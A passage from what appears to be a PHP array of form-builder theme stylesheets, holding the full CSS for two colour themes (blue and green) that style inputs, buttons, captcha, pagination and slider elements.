!important;\ncolor:#000 !important;\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\ncolor:#000 !important;\n}\n.label\n{\nborder:none !important;\ncolor:#000 !important;\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.input_deactive\n{\ncolor:#999999 !important;\nfont-style:italic !important;\nborder:1px solid #000 !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:4px !important;\nheight:17px;\n}\n.input_active\n{\ncolor:#000000 !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:4px !important;\nheight:17px;\n}\n.required\n{\nborder:none !important;\ncolor:red\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_black.png) !important;\n}\n.captcha_input\n{\nheight:17px !important;\nborder-radius:4px !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}\n.file_upload\n{\nborder:1px solid #000 !important;\nborder-radius:4px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncolor:#000 !important;\n}    \n.page_deactive\n{\ncolor:#ffffff !important;\nborder:1px solid #000000 !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nborder-radius: 3px !important;\nbackground-color:#FED69B !important;\n}\n.page_active\n{\ncolor:#ffffff !important;\nborder:1px solid #ffffff !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/button1_3.png) !important;\nborder-radius: 3px !important;\nbox-shadow: 0px 0px 5px 2px black !important;\n}\n.page_percentage_active\n{\npadding:0px !important;\nmargin:0px !important;\nborder-spacing: 0px !important;\nheight:30px !important;\nline-height:30px !important;\nbackground-color:#FED69B !important;\nborder-radius:11px !important;\nfont-size:15px !important;\nfloat:left !important;\ntext-align: right !important; \nbox-shadow: 0px 0px 10px #ffffff !important;\n}\n.page_percentage_deactive\n{\nheight:30px !important;\nline-height:30px !important;\nborder:0px !important;\nbackground-image: url([SITE_ROOT]/images/button1_3.png) !important;\nborder-radius:11px !important;\ntext-align: left !important; \npadding:0px !important;\n}\n.page_numbers\n{\nfont-size:11px !important;\ncolor:#000 !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius:4px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-image: url([SITE_ROOT]/images/button1_3.png) !important;\nborder: 1px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\n.button_reset\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius:4px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-image: url([SITE_ROOT]/images/button1_3.png) !important;\nborder: 1px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\n.other_input\n{\nborder-radius:4px !important;\nborder:1px solid #000 !important;\nheight:17px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nmargin-left: 25px !important;\n}\n#recaptcha_response_field\n{\nborder-radius:4px !important;\n}\n.wdform_button button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 5px !important;\nmin-width:80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-image: url([SITE_ROOT]/images/button1_3.png) !important;\nborder: 1px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\nbutton.wdform_page_button\n{\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 5px !important;\nmin-width:80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-image: url([SITE_ROOT]/images/button1_3.png) !important;\nborder: 1px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\ncursor:pointer !important;\n}\nspan.wdform_page_button\n{\ncolor:#000 !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.wdform_page_navigation\n{\ntext-align:center !important;\nmargin-bottom:10px !important;\n}\n.wdform_percentage_text\n{\nmargin:3px 7px 3px 3px !important;\ncolor:#fff !important;\nfont-weight:bold !important;\n}\n.wdform_percentage_title\n{\ncolor:#fff !important;\nfont-style:italic !important;\nmargin: 0px 0px 0px 40px !important;\n}\n.wdform_map>div\n{\nborder:5px solid white !important;\nborder-radius:7px !important;\n}\n.wdform_scale_rating table input\r\n{\r\nmargin:0 2px;\r\n}\r\n\r\n.wdform_scale_rating span\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.wdform_grading .grading_div\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.wdform_grading input\r\n{\r\npadding: 0 4px;\nmargin:0 0 3px;\r\nborder-radius:4px;\r\nborder: 0px;\r\npadding:0 4px;\r\n}\r\n\r\n.ui-slider-handle:hover, .ui-slider-handle:focus\r\n{\r\nbackground:#FFFFFF !important;\r\nborder:1px solid #FFFFFF;\r\noutline:none;\r\n}\r\n\r\n.ui-slider-handle, .ui-slider-range\r\n{\r\nbackground:#FFFFFF;\r\nborder:1px solid #FFFFFF;\r\n}\r\n\r\n.ui-slider\r\n{\r\nborder:1px solid #FFFFFF;\r\nbackground:none;\r\n}\r\n\r\n.ui-spinner-button:hover\r\n{\r\nbackground:#FFFFFF;\r\n}\r\n\r\n.ui-icon\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.ui-icon:hover\r\n{\r\ncolor:#0090E3;\r\n}\r\n\r\n.ui-spinner-input\r\n{\r\ncolor:#000000;\r\n}\r\n\r\n\r\n.ui-spinner\r\n{\r\nborder:1px solid #FFFFFF;\r\nmargin-right:3px !important;\r\n\r\n}\r\n\r\n.ui-spinner-button\r\n{\r\nborder-left:1px solid #FFFFFF;\r\n}\r\n\r\n.ui-spinner-input:focus\r\n{\r\noutline: none;\r\nborder:none !important;\r\n}\r\n\r\n.matrix_ \r\n{\r\npadding:4px 0;\r\nbackground:none;\r\n}\r\n\r\n.matrix_ label\r\n{\r\n\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.wdform_matrix table\r\n{\r\nborder-collapse: separate !important;\r\n}\r\n\r\n.wdform_matrix table td\r\n{\r\nborder:1px solid #FFFFFF;\r\nborder-radius:4px;\r\n}\r\n\r\n.wdform_matrix table tr:first-child td:first-child\r\n{\r\nborder:none;\r\n}\r\n\r\n.wdform_matrix table input, .wdform_matrix table select\r\n{\r\nborder-radius:4px;\r\nborder:1px solid #FFFFFF;\r\nmargin:5px 7px;\r\npadding:1px;\r\n}\r\n\r\n.wdform_paypal_total\r\n{\r\ncolor:#ffffff;\r\n}",
      "6" => ".wdform_td1 input {\n-webkit-box-sizing: content-box;\n-moz-box-sizing: content-box;\nbox-sizing: content-box;\n}\ntable {\n font-size: 12px !important;\n}\n.wdform_table1 table, .wdform_table1{\nborder:inherit !important;\nmargin:inherit !important;\n}\n.wdform_table1 table{\n	background-color:inherit;\n}\n.wdform_table1 img{\n	max-width:inherit !important;\n}\n.wdform_table2, .wdform_table2 table{\nwidth: inherit !important;\n}\n.page_numbers\n.file_upload{\nfont-size:12px !important;\n}\n.page_numbers{\n	vertical-align:middle !important;\n}\n.wdform_table1 button\n{\n	background-image:none !important;\n}\n .calendar tr, .calendar td, .calendar table{\n	padding:inherit;\n	margin:inherit;\n}\n.wdform_page_button{\n	max-width:inherit !important;\n}\n.button, .button_reset, .button_submit{\n	padding-bottom:inherit !important;\n	padding-top:inherit !important;\n}\n.wdform_table1 td, .wdform_table1 tr{\n	text-align:left;\n	border:inherit !important;\n	vertical-align:middle;\npadding:inherit  !important;\nmargin-bottom: inherit !important;\nmargin-top: inherit !important;\n}\n .wdform_table2 tr{\n	vertical-align:top !important;\ntext-align: left !important;\n}\n.wdform_table1 input, .wdform_table1 textara, .wdform_table1 select{\n	line-height:1 !important;\n    margin-bottom:inherit !important;\n	margin-top:inherit !important;\n    font-size:inherit !important; \n    display:inherit !important;\n	color:#000;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nwidth:100% !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nwidth:100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:#0090E3 !important;\ntext-align:center !important;\nborder-radius:10px !important;\nfloat:left !important;\nwidth: 100% !important;\n}\n.wdform_tr1\n{\nvertical-align:top !important;\nwidth:100% !important;\n}\n.wdform_table2\n{\npadding-right:0px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 2px !important;\nborder-collapse:separate !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nwidth:100% !important;\n}\n.wdform_select select\n{\nborder-radius:4px !important;\nborder:0px !important;\npadding:1px !important;\nmargin:1px !important;\nheight:19px !important;\n}\n.wdform_input input\n{\nborder-radius:4px !important;\nborder:0px !important;\npadding:1px !important;\nmargin:1px !important;\nheight:16px !important;\n}\n.wdform_date_fields select\n{\nborder-radius:4px !important;\nheight:19px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:0px !important;\n}\n.am_pm_select\n{\nborder-radius:4px !important;\nheight:19px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:0px !important;\n}\n.wdform_date_fields input\n{\nborder-radius:4px !important;\nborder:0px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_address input\n{\nborder-radius:4px !important;\nborder:0px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_date\n{\nborder:0px !important;\nborder-radius:4px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_address select\n{\nborder-radius:4px !important;\nheight:19px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:0px !important;\n}\n.wdform_colon\n{\ncolor:#ffffff\n}\n.wdform_separator\n{\nfont-style:bold !important;\nvertical-align:middle !important;\ncolor:#ffffff !important;\n}\n.wdform_line\n{\ncolor:#ffffff\n}\n.time_box\n{\nborder-radius:4px !important;\nheight:16px !important;\nborder:0px !important;\npadding:1px !important;\nmargin:1px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle !important;\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#ffffff !important;\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\ncolor:#ffffff !important;\n}\n.label\n{\nborder:none !important;\ncolor:#ffffff !important;\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.input_deactive\n{\ncolor:#999999 !important;\nfont-style:italic !important;\nborder:0px !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:4px !important;\nheight:16px;\n}\n.input_active\n{\ncolor:#000000 !important;\nfont-style:normal !important;\nborder:0px !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:4px !important;\nheight:16px;\n}\n.required\n{\nborder:none !important;\ncolor:red\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_white.png) !important;\n}\n.captcha_input\n{\nheight:20px !important;\nborder-radius:4px !important;\nborder:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}\n.file_upload\n{\nborder:1px solid #ffffff !important;\nborder-radius:4px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncolor:#ffffff !important;\n}    \n.page_deactive\n{\ncolor:#000 !important;\nborder:2px solid #000000 !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nborder-radius: 3px !important;\nbackground-color:#fff !important;\nfont-weight: bold !important;\n}\n.page_active\n{\ncolor:#ffffff !important;\nborder:2px solid #ffffff !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#0090E3 !important;\nborder-radius: 3px !important;\nbox-shadow: 0px 0px 5px 2px black !important;\nfont-weight: bold !important;\n}\n.page_percentage_active\n{\npadding:0px !important;\nmargin:0px !important;\nborder-spacing: 0px !important;\nheight:30px !important;\nline-height:30px !important;\nbackground-color:#0090E3 !important;\nborder-radius:8px !important;\nfont-size:15px !important;\nfloat:left !important;\ntext-align: right !important; \nbox-shadow: 0px 0px 10px #fff !important;\n}\n.page_percentage_deactive\n{\nheight:30px !important;\nline-height:30px !important;\nborder:2px solid #000 !important;\nbackground-color:#fff !important;\nborder-radius:11px !important;\ntext-align: left !important; \npadding:0px !important;\nbox-shadow: 0px 0px 10px #000 !important;\n}\n.page_numbers\n{\nfont-size:11px !important;\ncolor:#ffffff !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius:4px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #000 !important;\nbackground-color:#fff !important;\nborder: 2px solid black !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\n.button_reset\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius:4px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #000 !important;\nbackground-color:#fff !important;\nborder: 2px solid black !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\n.other_input\n{\nborder-radius:4px !important;\nborder: 0px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nmargin-left: 25px !important;\n}\n#recaptcha_response_field\n{\nborder-radius:4px !important;\n}\n.wdform_button button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 5px !important;\nmin-width:80px !important;\nmin-height: 30px !important;\ncolor: #000 !important;\nbackground-color:#fff !important;\nborder: 2px solid black !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\nbutton.wdform_page_button\n{\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 5px !important;\nmin-width:80px !important;\nmin-height: 30px !important;\ncolor: #000 !important;\nbackground-color:#fff !important;\nborder: 2px solid black !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\ncursor:pointer !important;\n}\nspan.wdform_page_button\n{\ncolor:#ffffff !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\ncolor: white !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.wdform_page_navigation\n{\ntext-align:center !important;\nmargin-bottom:10px !important;\n}\n.wdform_percentage_text\n{\nmargin:3px 7px 3px 3px !important;\ncolor:#000 !important;\nfont-weight:bold !important;\n}\n.wdform_percentage_title\n{\ncolor:#000 !important;\nfont-style:italic !important;\nmargin: 0px 0px 0px 40px !important;\n}\n.wdform_map>div\n{\nborder:5px solid white !important;\nborder-radius:7px !important;\n}\n.wdform_footer\r\n{\r\nmargin:10px;\r\ndisplay: table;\r\nwidth: 90%;\r\n}\r\n\r\n.wdform_scale_rating table input\r\n{\r\nmargin:0 2px;\r\n}\r\n\r\n.wdform_scale_rating span\r\n{\r\nfont-weight:bold;\r\n}\r\n\r\n.wdform_grading .grading_div\r\n{\r\nfont-weight:bold;\r\n}\r\n\r\n.wdform_grading input\r\n{\r\npadding: 0 4px;\nmargin:0 0 3px;\r\nborder-radius:4px;\r\nborder: 1px solid #000000;\r\npadding:0 4px;\r\n}\r\n\r\n.ui-slider-handle:hover, .ui-slider-handle:focus\r\n{\r\nbackground:#FFFFFF!important;\r\nborder:1px solid #000000;\r\n}\r\n\r\n.ui-slider-handle, .ui-slider-range{\r\nbackground:#FFFFFF;\r\nborder:1px solid #000000;\r\n}\r\n\r\n.ui-slider\r\n{\r\nborder:1px solid #000000;\r\nbackground:none;\r\n}\r\n\r\n.ui-spinner-button:hover\r\n{\r\nbackground:#FFFFFF;\r\n}\r\n\r\n.ui-icon\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.ui-icon:hover\r\n{\r\ncolor:#2A9E19;\r\n}\r\n\r\n.ui-spinner-input\r\n{\r\ncolor:#000000;\r\n}\r\n\r\n.ui-spinner\r\n{\r\nborder:1px solid #000000;\r\nmargin-right:3px !important;\r\n}\r\n\r\n.ui-spinner-button\r\n{\r\nborder-left:1px solid #000000;\r\n}\r\n\r\n.ui-spinner-input:focus\r\n{\r\noutline: none;\r\nborder:none !important;\r\n}\r\n\r\n\r\n.matrix_ \r\n{\r\npadding:4px 0;\r\nbackground:none;\r\n}\r\n\r\n.matrix_ label\r\n{\r\ncolor:#00000;\r\n}\r\n\r\n.wdform_matrix table\r\n{\r\nborder-collapse: separate !important;\r\n\r\n}\r\n\r\n.wdform_matrix table td\r\n{\r\nborder-radius:4px !important;\r\n}\r\n\r\n.wdform_matrix table tr:first-child td:first-child\r\n{\r\nborder:none;\r\n}\r\n\r\n.wdform_matrix table input , .wdform_matrix table select\r\n{\r\nborder-radius:4px;\r\nmargin:5px 7px;\r\nborder:1px solid #000000;\r\npadding:1px;\r\n}\r\n\r\n.wdform_paypal_total\r\n{\r\nfont-weight:bold;\r\n}",
      "7" => ".wdform_td1 input {\n-webkit-box-sizing: content-box;\n-moz-box-sizing: content-box;\nbox-sizing: content-box;\n}\ntable {\n font-size: 12px !important;\n}\n.wdform_table1 table, .wdform_table1{\nborder:inherit !important;\nmargin:inherit !important;\n}\n.wdform_table1 img{\n	max-width:inherit !important;\n}\n.wdform_table1 table{\n	background-color:inherit;\n}\n.wdform_table2, .wdform_table2 table{\nwidth: inherit !important;\n}\n.page_numbers\n.file_upload{\nfont-size:12px !important;\n}\n.page_numbers{\n	vertical-align:middle !important;\n}\n.wdform_table1 button\n{\n	background-image:none !important;\n}\n .calendar tr, .calendar td, .calendar table{\n	padding:inherit;\n	margin:inherit;\n}\n.wdform_page_button{\n	max-width:inherit !important;\n}\n.button, .button_reset, .button_submit{\n	padding-bottom:inherit !important;\n	padding-top:inherit !important;\n}\n.wdform_table1 td, .wdform_table1 tr{\n	text-align:left;\n	border:inherit !important;\n	vertical-align:middle;\npadding:inherit  !important;\nmargin-bottom: inherit !important;\nmargin-top: inherit !important;\n}\n .wdform_table2 tr{\n	vertical-align:top !important;\ntext-align: left !important;\n}\n.wdform_table1 input, .wdform_table1 textara, .wdform_table1 select{\n	line-height:1 !important;\n    margin-bottom:inherit !important;\n	margin-top:inherit !important;\n    font-size:inherit !important; \n    display:inherit !important;\n	color:#000;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nwidth:100% !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nwidth:100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:#2A9E19 !important;\ntext-align:center !important;\nborder-radius:10px !important;\nfloat:left !important;\nwidth: 100% !important;\n}\n.wdform_tr1\n{\nvertical-align:top !important;\nwidth:100% !important;\n}\n.wdform_table2\n{\npadding-right:0px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 2px !important;\nborder-collapse:separate !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nwidth:100% !important;\n}\n.wdform_select select\n{\nborder-radius:4px !important;\nborder:1px solid #000 !important;\npadding:1px !important;\nmargin:1px !important;\nheight:21px !important;\n}\n.wdform_input input\n{\nborder-radius:4px !important;\nborder:1px solid #000 !important;\npadding:1px !important;\nmargin:1px !important;\nheight:17px !important;\n}\n.wdform_date_fields select\n{\nborder-radius:4px !important;\nheight:21px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:1px solid #000 !important;\n}\n.am_pm_select\n{\nborder-radius:4px !important;\nheight:21px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:1px solid #000 !important;\n}\n.wdform_date_fields input\n{\nborder-radius:4px !important;\nborder:1px solid #000 !important;\nheight:17px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_address input\n{\nborder-radius:4px !important;\nborder:1px solid #000 !important;\nheight:17px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_date\n{\nborder:1px solid #000 !important;\nborder-radius:4px !important;\nheight:17px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\n}\n.wdform_address select\n{\nborder-radius:4px !important;\nheight:21px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder:1px solid #000 !important;\n}\n.wdform_colon\n{\ncolor:#000 !important;\n}\n.wdform_separator\n{\nfont-style:bold !important;\nvertical-align:middle !important;\ncolor:#000 !important;\n}\n.wdform_line\n{\ncolor:#000 !important;\n}\n.time_box\n{\nborder-radius:4px !important;\nheight:16px !important;\nborder:1px solid #000 !important;\npadding:1px !important;\nmargin:1px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle !important;\nheight:17px !important;\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#000 !important;\nfont-weight: bold !important;\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\ncolor:#000 !important;\nfont-weight: bold !important;\nfont-size:12px !important;\n}\n.label\n{\nborder:none !important;\ncolor:#000 !important;\nfont-weight: bold !important;\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.input_deactive\n{\ncolor:#999999 !important;\nfont-style:italic !important;\nborder:1px solid #000 !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:4px !important;\nheight:17px;\n}\n.input_active\n{\ncolor:#000000 !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 1px !important;\npadding: 1px !important;\nborder-radius:4px !important;\nheight:17px;\n}\n.required\n{\nborder:none !important;\ncolor:red\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_black.png) !important;\n}\n.captcha_input\n{\nheight:17px !important;\nborder-radius:4px !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\n}\n.file_upload\n{\nborder:1px solid #000 !important;\nborder-radius:4px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncolor:#000 !important;\nbackground-color:#fff !important;\n}    \n.page_deactive\n{\ncolor:#ffffff !important;\nborder:1px solid #000000 !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nborder-radius: 3px !important;\nbackground-color:#2A9E19 !important;\n}\n.page_active\n{\ncolor:#ffffff !important;\nborder:1px solid #ffffff !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#000000 !important;\nborder-radius: 3px !important;\nbox-shadow: 0px 0px 5px 2px black !important;\n}\n.page_percentage_active\n{\npadding:0px !important;\nmargin:0px !important;\nborder-spacing: 0px !important;\nheight:30px !important;\nline-height:30px !important;\nbackground-color:#2A9E19 !important;\nborder-radius:11px !important;\nfont-size:15px !important;\nfloat:left !important;\ntext-align: right !important; \nbox-shadow: 0px 0px 10px #ffffff !important;\n}\n.page_percentage_deactive\n{\nheight:30px !important;\nline-height:30px !important;\nborder:0px !important;\nbackground-color:#000000 !important;\nborder-radius:11px !important;\ntext-align: left !important; \npadding:0px !important;\n}\n.page_numbers\n{\nfont-size:11px !important;\ncolor:#000 !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius:4px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#000000 !important;\nborder: 1px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\n.button_reset\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius:4px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#000000 !important;\nborder: 1px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\n.other_input\n{\nborder-radius:4px !important;\nborder:1px solid #000 !important;\nheight:17px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nmargin-left: 25px !important;\n}\n#recaptcha_response_field\n{\nborder-radius:4px !important;\n}\n.wdform_button button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 5px !important;\nmin-width:80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#000000 !important;\nborder: 1px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\n}\nbutton.wdform_page_button\n{\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 5px !important;\nmin-width:80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#000000 !important;\nborder: 1px solid #fff !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px #000000 !important;\ncursor:pointer !important;\n}\nspan.wdform_page_button\n{\ncolor:#000 !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.wdform_page_navigation\n{\ntext-align:center !important;\nmargin-bottom:10px !important;\n}\n.wdform_percentage_text\n{\nmargin:3px 7px 3px 3px !important;\ncolor:#fff !important;\nfont-weight:bold !important;\n}\n.wdform_percentage_title\n{\ncolor:#fff !important;\nfont-style:italic !important;\nmargin: 0px 0px 0px 40px !important;\n}\n.wdform_map>div\n{\nborder:5px solid white !important;\nborder-radius:7px !important;\n}\n.wdform_scale_rating table input\r\n{\r\nmargin:0 2px;\r\n}\r\n\r\n.wdform_scale_rating span\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.wdform_grading .grading_div\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.wdform_grading input\r\n{\r\npadding: 0 4px;\nmargin:0 0 3px;\r\nborder-radius:4px;\r\nborder: 0px;\r\npadding:0 4px;\r\n}\r\n\r\n.ui-slider-handle:hover, .ui-slider-handle:focus\r\n{\r\nbackground:#FFFFFF !important;\r\n}\r\n\r\n.ui-slider-handle, .ui-slider-range\r\n{\r\nbackground:#FFFFFF;\r\n}\r\n\r\n.ui-slider\r\n{\r\nbackground:none;\r\n}\r\n\r\n.ui-spinner-button:hover\r\n{\r\nbackground:#FFFFFF;\r\n}\r\n\r\n.ui-icon\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.ui-icon:hover\r\n{\r\ncolor:#333;\r\n}\r\n\r\n.ui-spinner-input\r\n{\r\ncolor:#000000;\r\n}\r\n\r\n.ui-spinner-input:focus\r\n{\r\noutline: none;\r\nborder:none !important;\r\n}\r\n\r\n.ui-spinner\r\n{\r\nmargin-right:3px !important;\r\n}\r\n\r\n.matrix_ \r\n{\r\npadding:4px 0;\r\nbackground:none;\r\n}\r\n\r\n.matrix_ label\r\n{\r\ncolor:#FFFFFF;\r\n}\r\n\r\n.wdform_matrix table\r\n{\r\nborder-collapse: separate !important;\r\n}\r\n\r\n.wdform_matrix table td\r\n{\r\nborder:1px solid #FFFFFF;\r\nborder-radius:4px;\r\n}\r\n\r\n.wdform_matrix table tr:first-child td:first-child\r\n{\r\nborder:none;\r\n}\r\n\r\n.wdform_matrix table input, .wdform_matrix table select\r\n{\r\nborder-radius:4px;\r\nborder:1px solid #FFFFFF;\r\nmargin:5px 7px;\r\npadding:1px;\r\n}\r\n\r\n.wdform_paypal_total\r\n{\r\ncolor:#ffffff;\r\n}",
